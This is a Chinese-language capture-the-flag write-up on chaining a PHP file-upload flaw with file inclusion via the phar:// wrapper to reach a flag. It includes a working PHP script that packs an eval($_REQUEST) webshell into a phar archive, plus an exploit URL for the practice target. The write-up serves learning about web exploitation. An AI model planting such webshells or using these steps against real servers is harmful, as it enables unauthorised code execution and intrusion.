本文详细描述了一次利用PHP文件上传和文件包含漏洞进行攻击的过程。作者首先发现了一个URL参数可以改变,尝试注入后成功触发了文件包含。接着,通过创建包含PHP代码的ZIP文件并利用phar协议,成功执行了代码,获取了flag。文章提供了两种不同的方法来获取flag,并介绍了如何构造和利用phar文件。整个过程展示了Web安全中常见的文件上传漏洞利用技巧。
1. 进入靶场环境,提示upload,应该是一个文件上传与文件包含相关的题目。
2. 点击upload进入文件上传页面。看到url有一个bingdundun的get传参,我们尝试传入其他值尝试一下。
3. 尝试传入index,发现index页面的内容被大量包含进来,并且会自动在后面添加.php
4. 在看文件上传点提示可以传图片或压缩包,因此考虑php伪协议中的phar协议或zip协议。首先写一个phpinfo()脚本,打成zip压缩包并上传,上传成功后利用phar协议包含压缩包中的脚本文件,发现脚本中的php代码被成功包含进来并被当作代码执行了。
获取flag方法
方法一:
利用phar协议读取上传一句话木马,用菜刀链接。
http://1.14.71.254:28884/?bingdundun=phar://23de81832e6ba264115a6192202105f7.zip/reqma
方法二:
构造phar文件,phar文件包含我们想要执行的代码,由于index页面提示,flag就在根目录下,因此如果能直接执行cat /flag 就能出结果了。
构造phar文件方法
- 修改php.ini 让phar.readonly 改成off。
- 创建一个pharfile.php文件,代码如下,用于生成phar包
<?php
$phar = new Phar("exp.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->addFromString("pharfile.php", '<?php eval($_REQUEST["ps"]);?>');
$phar->stopBuffering();
?>3. 浏览器访问该文件,在同目录下会生成exp.phar文件。复制一份改成zip格式,然后上传
4. phar://协议将文件包含到当前页面,然后给ps参数传入想要执行的代码值,执行成功。
5. 根据代码提示flag在根目录下,因此构造url得到flag。
扫一扫
751
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
